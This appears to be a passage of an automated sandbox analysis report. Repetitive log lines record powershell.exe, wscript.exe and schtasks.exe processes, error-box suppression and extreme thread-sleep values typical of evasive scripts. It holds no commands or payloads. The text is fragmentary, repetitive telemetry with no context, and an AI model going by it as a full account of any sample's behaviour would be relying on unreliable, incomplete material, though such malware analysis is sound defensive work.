      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\schtasks.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3810Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6049Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5815Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3163Jump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5891
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2081
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4674
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3963
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2872Thread sleep time: -14757395258967632s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4972Thread sleep time: -16602069666338586s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5016Thread sleep time: -922337203685477s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3268Thread sleep time: -30000s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4904Thread sleep time: -1844674407370954s >= -30000sJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 5732Thread sleep count: 5891 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4044Thread sleep count: 2081 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2436Thread sleep time: -13835058055282155s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2264Thread sleep time: -2767011611056431s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7032Thread sleep time: -30000s >= -30000s
